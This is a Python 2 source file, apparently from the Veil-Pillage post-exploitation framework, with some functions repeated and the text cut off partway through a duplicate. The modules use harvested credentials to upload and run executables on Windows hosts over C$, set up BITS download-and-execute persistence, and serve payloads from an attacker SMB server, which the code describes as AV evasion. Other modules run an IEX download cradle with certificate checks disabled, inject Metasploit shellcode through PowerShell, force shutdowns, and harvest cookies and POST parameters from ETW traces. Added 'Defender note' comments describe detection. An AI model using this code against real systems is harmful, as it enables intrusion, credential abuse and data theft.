def run(self):
    """
    Upload netview.exe from the local data directory to C:\\Windows\\Temp on
    each target over the C$ admin share and start it there with the configured
    trigger method, pointing its output at ``out_file`` on the target.

    Reads self.creds[0], self.required_options ("trigger_method", "out_file",
    "args") and self.targets; appends one status line per target to
    self.output. Returns nothing. The status line embeds the cleartext
    password, so anything that persists self.output is credential-bearing.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    # grab our options (index 0 appears to hold the option's value;
    # confirm against the module base class)
    triggerMethod = self.required_options["trigger_method"][0]
    out_file = self.required_options["out_file"][0]
    args = self.required_options["args"][0]

    # a bare file name (no backslash) is placed under the Windows temp directory
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file

    # local path of the binary that gets pushed; it lands on the target under
    # its real name, not a randomized one
    exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/netview.exe"

    # the command to invoke netview.exe
    cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

    # see if there are any extra arguments we want to add in; "none" is the
    # option's placeholder for "no extra args", anything else is appended verbatim
    if args != "none":
        cmd = cmd + " " + args

    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\ via the C$ share.
        # Neither call's result is inspected, so the status line below is
        # written even if the upload or the trigger failed.
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
        # execute netview.exe
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)
        # Defender note: an executable written over C$ into Windows\Temp followed
        # by a remote process start from that path is visible in share-access
        # and process-creation auditing on the target.
        self.output += "[*] netview.exe uploaded and executed using creds '"+username+":"+password+"' on "+target+" using "+triggerMethod+"\n"
def run(self):
    """
    Create and start a BITS job on each target that downloads ``exe_url`` to
    C:\\Windows\\Temp\\updater.exe and registers that file as the job's notify
    command, so BITS launches it once the transfer completes, retrying on the
    configured interval.

    Reads self.creds[0], self.required_options ("exe_url", "interval",
    "job_name") and self.targets. Appends a status line per target to
    self.output and a cleanup record per target to self.cleanup; both embed
    the cleartext password. Returns nothing. The trigger method is hard-wired
    to winexe and ignores any module option.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    exe_url = self.required_options["exe_url"][0]
    interval = self.required_options["interval"][0]
    job_name = self.required_options["job_name"][0]
    triggerMethod = "winexe"

    # create the bitsadmin job, set the retry interval, kick everything off.
    # All steps are chained with '&' into one cmd.exe line; job_name and exe_url
    # are inserted unquoted, so values containing spaces or '&' break the line.
    # int(interval) raises ValueError for a non-numeric option; the value appears
    # to be minutes and is multiplied by 60 for SETMINRETRYDELAY.
    # Python 2 byte string: the "\W", "\T", "\u" sequences are kept literally.
    cmd = "bitsadmin /create " + job_name + " & bitsadmin /addfile " + job_name + " " + exe_url + " C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE " + job_name + " C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY " + job_name + " " + str( int(interval) * 60) + " & bitsadmin /resume " + job_name

    # bitsadmin cleanup -> cancel this specific job
    cleanupCMD = "bitsadmin /cancel " + job_name

    for target in self.targets:
        # the "started" line is recorded before the command runs and the
        # executeCommand() result is never inspected, so self.output does not
        # reflect whether the job was actually created
        self.output += "[*] Bitsadmin job started with url " + exe_url + " using creds '" + username + ":" + password + "' on " + target + "\n"
        command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod)
        # pipe-delimited record for the framework's cleanup step (format inferred
        # from the literal; verify against the cleanup parser).
        # Defender note: BITS jobs persist across reboots; `bitsadmin /list /allusers`
        # and the BITS-Client operational event log expose them.
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""): """ Take a particular exe at "exePath" path and uploads it to each target in targets, using the specified username and password. The specified triggerMethod (default wmis) is then used to trigger the uploaded executable. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the uploaded .exe file name uploadFileName = helpers.randomString() + ".exe" # copy the payload to the random hostedFileName in the temp directory os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName) # command to trigger the uploaded executable cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs for target in targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5) # execute the trigger command command_methods.executeCommand(target, username, password, cmd, triggerMethod) # return the randomized name in the calling method later wants # to clean the processes up return uploadFileName
def run(self):
    """
    Upload finddllhijack.exe to C:\\Windows\\Temp on each target over the C$
    share, run it with the configured trigger method, capture its output,
    delete the uploaded binary and store the output as finddllhijack.txt via
    helpers.saveModuleFile().

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # local path of the binary to push and the remote command that runs it
    exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
    cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\ (result not checked)
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

        # execute finddllhijack and get the results; pause=5 is passed through
        # to executeResult (presumably seconds to wait before collecting output)
        out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)

        # cleanup: remove the uploaded binary from the target
        command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

        # save the file off to the appropriate location.
        # This runs before the emptiness check, so an empty result file is
        # still written on failure.
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

        if out != "":
            self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self):
    """
    Upload netview.exe from the local data directory to C:\\Windows\\Temp on
    each target over the C$ admin share and start it there with the configured
    trigger method, pointing its output at ``out_file`` on the target.

    Reads self.creds[0], self.required_options ("trigger_method", "out_file",
    "args") and self.targets; appends one status line per target to
    self.output. Returns nothing. The status line embeds the cleartext
    password, so anything that persists self.output is credential-bearing.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    # grab our options (index 0 appears to hold the option's value;
    # confirm against the module base class)
    triggerMethod = self.required_options["trigger_method"][0]
    out_file = self.required_options["out_file"][0]
    args = self.required_options["args"][0]

    # a bare file name (no backslash) is placed under the Windows temp directory
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file

    # local path of the binary that gets pushed; it lands on the target under
    # its real name, not a randomized one
    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

    # the command to invoke netview.exe
    cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

    # see if there are any extra arguments we want to add in; "none" is the
    # option's placeholder for "no extra args", anything else is appended verbatim
    if args != "none":
        cmd = cmd + " " + args

    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\ via the C$ share.
        # Neither call's result is inspected, so the status line below is
        # written even if the upload or the trigger failed.
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
        # execute netview.exe
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)
        # Defender note: an executable written over C$ into Windows\Temp followed
        # by a remote process start from that path is visible in share-access
        # and process-creation auditing on the target.
        self.output += "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
    """
    Spins up an Impacket SMB server and hosts the binary specified by exePath.

    The specified triggerMethod (default wmis) is then used to invoke a command
    with the UNC path "\\localHost\\exe" which will invoke the specified executable
    purely in memory.

    Note: this evades several AV vendors, even with normally disk-detectable executables
    #avlol :)

    This takes 'targets' instead of a single 'target' since we don't want to set up
    and tear down the local SMB server every time.

    targets   - a host string or a list of host strings
    exePath   - local path of the executable to host
    localHost - address the targets use to reach this machine's SMB server
    exeArgs   - arguments appended to the remote command line

    Returns the randomized file name the binary was hosted under. The server is
    shut down and the hosted directory removed on the normal path only; an
    exception from executeCommand() leaves both in place.
    """

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the hosted .exe file name
    hostedFileName = helpers.randomString() + ".exe"

    # make the tmp hosting directory if it doesn't already exist.
    # NOTE(review): this path is TEMP_DIR + "shared/", while the cp and rm below
    # use "/" + TEMP_DIR + "/shared/" — they only agree for some TEMP_DIR values; confirm.
    if not os.path.exists(settings.TEMP_DIR + "shared/"):
        os.makedirs(settings.TEMP_DIR + "shared/")

    # copy the payload to the random hostedFileName in the temp directory
    # (shell string; metacharacters in exePath are interpreted by the shell)
    os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/shared/" + hostedFileName)

    # spin up the SMB server; the short sleep gives the thread time to bind
    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    # build the UNC path back to our host and executable and any specified arguments
    # ("system" is the share name the server is expected to expose)
    cmd = "\\\\" + localHost + "\\system\\" + hostedFileName+" "+exeArgs

    for target in targets:
        # execute the UNC command for each target (result not checked).
        # Defender note: the target makes an outbound SMB connection to localHost
        # and starts a process whose image path is a UNC path — both are
        # visible in network and process-creation logging.
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    print helpers.color("\n [*] Giving time for commands to trigger...")

    # sleep so the wmis/winexe commands can trigger and the target
    # can grab the .exe from the SMB server
    time.sleep(10)

    # shut the smb server down
    server.shutdown()

    # remove the temporarily hosted files.
    # NOTE(review): if settings.TEMP_DIR were empty this would target "/shared/";
    # the rm is not guarded against that.
    os.system("rm -rf " + settings.TEMP_DIR+"/shared/")

    # not sure if need to do this to kill off the smb server...
    # os.kill(os.getpid(), signal.SIGINT) ?

    # return the randomized name in case the calling method later wants
    # to clean the processes up
    return hostedFileName
def run(self):
    """
    Build a PowerShell command from a virtual.Payload() (msfpayload options or
    custom shellcode taken from self.args), optionally spawn a Metasploit
    handler in a new gnome-terminal tab, then run the command on every target
    with the configured trigger method.

    Reads self.creds[0], self.required_options ("trigger_method",
    "spawn_handler"), self.args (msfpayload, msfoptions, custshell),
    self.name and self.targets. Appends a status line per target to
    self.output and a cleanup record per target to self.cleanup; both embed
    the cleartext password. Blocks on raw_input() when a handler is spawned.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # create our powershell payload
    p = virtual.Payload()

    # pull out any msfpayload payloads/options
    if self.args.msfpayload:
        p.shellcode.SetPayload( [self.args.msfpayload, self.args.msfoptions])
    # set custom shellcode if specified
    elif self.args.custshell:
        p.shellcode.setCustomShellcode(self.args.custshell)

    # get the powershell command
    powershellCommand = p.generate()

    # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    # if we're using Veil-Evasion's generated handler script, try to spawn it
    # (option compared case-insensitively against the literal "true")
    if spawnHandler.lower() == "true":
        # turn the payload shellcode object into a handler script
        handlerPath = helpers.shellcodeToHandler(p.shellcode)
        # make sure a handler was returned
        if handlerPath != "":
            # command to spawn a new tab; handlerPath is embedded in a shell
            # string, so quotes in it would break the line
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    for target in self.targets:
        print helpers.color(" [*] Triggering powershell command on " + target)
        # execute the powershell command on each host (result not checked)
        command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
        self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"
        # build our cleanup file -> kill all powershell processes.
        # Note this kills every powershell.exe on the target, not only the one
        # started here, so legitimate sessions are affected by the cleanup.
        killCMD = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
def run(self):
    """
    Build a PowerShell command from a virtual.Payload() (msfpayload options or
    custom shellcode taken from self.args), optionally spawn a Metasploit
    handler in a new gnome-terminal tab, then run the command on every target
    with the configured trigger method.

    Reads self.creds[0], self.required_options ("trigger_method",
    "spawn_handler"), self.args (msfpayload, msfoptions, custshell),
    self.name and self.targets. Appends a status line per target to
    self.output and a cleanup record per target to self.cleanup; both embed
    the cleartext password. Blocks on raw_input() when a handler is spawned.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # create our powershell payload
    p = virtual.Payload()

    # pull out any msfpayload payloads/options
    if self.args.msfpayload:
        p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
    # set custom shellcode if specified
    elif self.args.custshell:
        p.shellcode.setCustomShellcode(self.args.custshell)

    # get the powershell command
    powershellCommand = p.generate()

    # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    # if we're using Veil-Evasion's generated handler script, try to spawn it
    # (option compared case-insensitively against the literal "true")
    if spawnHandler.lower() == "true":
        # turn the payload shellcode object into a handler script
        handlerPath = helpers.shellcodeToHandler(p.shellcode)
        # make sure a handler was returned
        if handlerPath != "":
            # command to spawn a new tab; handlerPath is embedded in a shell
            # string, so quotes in it would break the line
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    for target in self.targets:
        print helpers.color(" [*] Triggering powershell command on "+target)
        # execute the powershell command on each host (result not checked)
        command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)
        self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"
        # build our cleanup file -> kill all powershell processes.
        # Note this kills every powershell.exe on the target, not only the one
        # started here, so legitimate sessions are affected by the cleanup.
        killCMD = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
def run(self):
    """
    Issue an immediate forced shutdown (``shutdown -t 0 -s -f``) on every
    target using the configured trigger method.

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output, chosen
    by whether the executeCommand() result contains "success". The status
    line embeds the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # shutdown.exe command to shut the machine down immediately (-t 0),
        # powering off (-s) and forcing running applications closed (-f)
        command = "shutdown -t 0 -s -f"
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # assumes executeCommand() returns a string; a None result would raise here
        if "success" in result:
            self.output += ( "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n" )
        else:
            self.output += ( "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n" )
def run(self):
    """
    Run a chain of local enumeration commands (ipconfig, arp, net users,
    net sessions, qwinsta, netstat, tasklist, systeminfo) on each target,
    redirecting their output to ``out_file`` on the target, wait 20 seconds,
    then fetch and delete that file over SMB and store it as enum_host.txt
    via helpers.saveModuleFile().

    Reads self.creds[0], self.required_options ("trigger_method", "out_file")
    and self.targets; appends one status line per target to self.output.
    The status line embeds the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    outFile = self.required_options["out_file"][0]

    # a bare file name (no backslash) is placed under the Windows temp directory
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile

    for target in self.targets:
        # unused; nothing below reads it
        targetUsernames = []

        # one cmd.exe line; every step appends to outFile. outFile is interpolated
        # unquoted, so a path containing spaces or '&' breaks the redirections.
        command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile}

        # execute the command (the returned value is not used)
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # wait 20 seconds for "systeminfo" to run; a fixed delay, so a slow
        # host yields a partial file
        print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
        time.sleep(20)

        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)

        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
            self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
    """
    Stop the ETW trace session named Status32 on each target, query its
    trace file C:\\Windows\\Temp\\status32.etl for lines matching the chosen
    flag ("POST" or "cookie added"), delete the trace file and store any
    matches via helpers.saveModuleFile().

    The trace itself is expected to have been started earlier (not by this
    method). Reads self.creds[0], self.required_options ("trigger_method",
    "flag") and self.targets; appends one status line per target to
    self.output, embedding the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    flag = self.required_options["flag"][0]

    for target in self.targets:
        # stop the ETW session (result not checked)
        stopCMD = "logman stop Status32 -ets"
        command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

        # search for cookies or POST parameters. 'flag' is rebound here, so on
        # later targets the comparison sees "POST" / "cookie added" rather than
        # the original option value; both still select the same branch.
        if flag.lower() == "post":
            flag = "POST"
            moduleFile = "post_params.txt"
        else:
            flag = "cookie added"
            moduleFile = "cookies.txt"

        # check the ETW results for the specified flag (case-insensitive find)
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""

        # wait 20 seconds for everything to parse...if errors happen, increase this
        parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

        # delete the trace file.
        # Defender note: "logman stop" of an unexpected session, wevtutil reading
        # an .etl out of Windows\Temp, and that file's deletion are all
        # auditable on the target.
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

        if parseResult == "":
            self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
    """
    Trigger a specific url to download a powershell script from.

    url - the full url (http/https) to download the second stage script from
    scriptArguments - the arguments to pass to the script we're invoking
    outFile - if you want the script to output to a file for later retrieval, put a path here
    noArch - don't do the arch-independent launcher

    Returns "" when triggerMethod is smbexec (refused, after a prompt) and
    None otherwise; the per-target executeCommand() results are discarded.
    """

    # this surpasses the length-limit implicit to smbexec I'm afraid :(
    if triggerMethod.lower() == "smbexec":
        print helpers.color( "\n\n [!] Error: smbexec will not work with powershell invocation", warning=True)
        raw_input(" [*] press any key to return: ")
        return ""

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # if the url doesn't start with http/https, assume http
    if not url.lower().startswith("http"):
        url = "http://" + url

    # "none" is the option placeholder for "no arguments"
    if scriptArguments.lower() == "none":
        scriptArguments = ""

    # powershell command to download/execute our secondary stage,
    # plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
    # for https, be sure to turn off warnings for self-signed certs in case we're hosting.
    # Note: the https branch disables certificate validation for the whole
    # PowerShell process, so the fetched script is not authenticated and can be
    # replaced by anyone positioned on the network path.
    if url.lower().startswith("https"):
        downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments
    else:
        downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('" + url + "');" + scriptArguments

    # get the encoded powershell command
    triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)

    # if we want to get output from the final execution, append it
    # (plain cmd.exe redirection; outFile is not quoted)
    if outFile:
        triggerCMD += " > " + outFile

    # execute the powershell trigger command on each target.
    # Defender note: an encoded PowerShell command line started by a remote
    # execution method, followed by an outbound HTTP(S) fetch from that process,
    # is visible in process-creation and script-block logging.
    for target in targets:
        print "\n [*] Executing command on " + target
        out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""): """ Take a particular exe at "exePath" path and uploads it to each target in targets, using the specified username and password. The specified triggerMethod (default wmis) is then used to trigger the uploaded executable. """ # if we get a single target, make it into a list if type(targets) is str: targets = [targets] # randomize the uploaded .exe file name uploadFileName = helpers.randomString() + ".exe" # copy the payload to the random hostedFileName in the temp directory os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/" + uploadFileName) # command to trigger the uploaded executable cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs for target in targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR + "/" + uploadFileName, 5) # execute the trigger command command_methods.executeCommand(target, username, password, cmd, triggerMethod) # return the randomized name in the calling method later wants # to clean the processes up return uploadFileName
def run(self):
    """
    Create and start a BITS job on each target that downloads ``exe_url`` to
    C:\\Windows\\Temp\\updater.exe and registers that file as the job's notify
    command, so BITS launches it once the transfer completes, retrying on the
    configured interval.

    Reads self.creds[0], self.required_options ("exe_url", "interval",
    "job_name") and self.targets. Appends a status line per target to
    self.output and a cleanup record per target to self.cleanup; both embed
    the cleartext password. Returns nothing. The trigger method is hard-wired
    to winexe and ignores any module option.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    exe_url = self.required_options["exe_url"][0]
    interval = self.required_options["interval"][0]
    job_name = self.required_options["job_name"][0]
    triggerMethod = "winexe"

    # create the bitsadmin job, set the retry interval, kick everything off.
    # All steps are chained with '&' into one cmd.exe line; job_name and exe_url
    # are inserted unquoted, so values containing spaces or '&' break the line.
    # int(interval) raises ValueError for a non-numeric option; the value appears
    # to be minutes and is multiplied by 60 for SETMINRETRYDELAY.
    # Python 2 byte string: the "\W", "\T", "\u" sequences are kept literally.
    cmd = "bitsadmin /create "+job_name+" & bitsadmin /addfile "+job_name+" "+exe_url+" C:\Windows\Temp\updater.exe & bitsadmin /SETNOTIFYCMDLINE "+job_name+" C:\Windows\Temp\updater.exe NULL & bitsadmin /SETMINRETRYDELAY "+job_name+" "+str(int(interval)*60) + " & bitsadmin /resume "+job_name

    # bitsadmin cleanup -> cancel this specific job
    cleanupCMD = "bitsadmin /cancel "+job_name

    for target in self.targets:
        # the "started" line is recorded before the command runs and the
        # executeCommand() result is never inspected, so self.output does not
        # reflect whether the job was actually created
        self.output += "[*] Bitsadmin job started with url "+exe_url+" using creds '"+username+":"+password+"' on " + target + "\n"
        command_methods.executeCommand(target, username, password, cmd, triggerMethod=triggerMethod)
        # pipe-delimited record for the framework's cleanup step (format inferred
        # from the literal; verify against the cleanup parser).
        # Defender note: BITS jobs persist across reboots; `bitsadmin /list /allusers`
        # and the BITS-Client operational event log expose them.
        self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
    """
    Upload finddllhijack.exe to C:\\Windows\\Temp on each target over the C$
    share, run it with the configured trigger method, capture its output,
    delete the uploaded binary and store the output as finddllhijack.txt via
    helpers.saveModuleFile().

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # local path of the binary to push and the remote command that runs it
    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
    cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\ (result not checked)
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

        # execute finddllhijack and get the results; pause=5 is passed through
        # to executeResult (presumably seconds to wait before collecting output)
        out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)

        # cleanup: remove the uploaded binary from the target
        command_methods.executeCommand( target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

        # save the file off to the appropriate location.
        # This runs before the emptiness check, so an empty result file is
        # still written on failure.
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

        if out != "":
            self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self):
    """
    Stop the ETW trace session named Status32 on each target, query its
    trace file C:\\Windows\\Temp\\status32.etl for lines matching the chosen
    flag ("POST" or "cookie added"), delete the trace file and store any
    matches via helpers.saveModuleFile().

    The trace itself is expected to have been started earlier (not by this
    method). Reads self.creds[0], self.required_options ("trigger_method",
    "flag") and self.targets; appends one status line per target to
    self.output, embedding the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    flag = self.required_options["flag"][0]

    for target in self.targets:
        # stop the ETW session (result not checked)
        stopCMD = "logman stop Status32 -ets"
        command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

        # search for cookies or POST parameters. 'flag' is rebound here, so on
        # later targets the comparison sees "POST" / "cookie added" rather than
        # the original option value; both still select the same branch.
        if flag.lower() == "post":
            flag = "POST"
            moduleFile = "post_params.txt"
        else:
            flag = "cookie added"
            moduleFile = "cookies.txt"

        # check the ETW results for the specified flag (case-insensitive find)
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""

        # wait 20 seconds for everything to parse...if errors happen, increase this
        parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

        # delete the trace file.
        # Defender note: "logman stop" of an unexpected session, wevtutil reading
        # an .etl out of Windows\Temp, and that file's deletion are all
        # auditable on the target.
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

        if parseResult == "":
            self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self):
    """
    Run ``logoff 1`` on every target using the configured trigger method,
    ending the interactive session with ID 1.

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output, chosen
    by whether the executeCommand() result contains "success". The status
    line embeds the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # logoff.exe command for session ID 1 (the session number is fixed;
        # it is not derived from "query user")
        command = "logoff 1"
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # assumes executeCommand() returns a string; a None result would raise here
        if "success" in result:
            self.output += "[*] Logoff command successfully triggered using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            self.output += "[!] Logoff command unsuccessful using creds '"+username+":"+password+"' on : " + target + "\n"
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
    """
    Trigger a specific url to download a powershell script from.

    url - the full url (http/https) to download the second stage script from
    scriptArguments - the arguments to pass to the script we're invoking
    outFile - if you want the script to output to a file for later retrieval, put a path here
    noArch - don't do the arch-independent launcher

    Returns "" when triggerMethod is smbexec (refused, after a prompt) and
    None otherwise; the per-target executeCommand() results are discarded.
    """

    # this surpasses the length-limit implicit to smbexec I'm afraid :(
    if triggerMethod.lower() == "smbexec":
        print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
        raw_input(" [*] press any key to return: ")
        return ""

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # if the url doesn't start with http/https, assume http
    if not url.lower().startswith("http"):
        url = "http://" + url

    # "none" is the option placeholder for "no arguments"
    if scriptArguments.lower() == "none":
        scriptArguments = ""

    # powershell command to download/execute our secondary stage,
    # plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
    # for https, be sure to turn off warnings for self-signed certs in case we're hosting.
    # Note: the https branch disables certificate validation for the whole
    # PowerShell process, so the fetched script is not authenticated and can be
    # replaced by anyone positioned on the network path.
    if url.lower().startswith("https"):
        downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
    else:
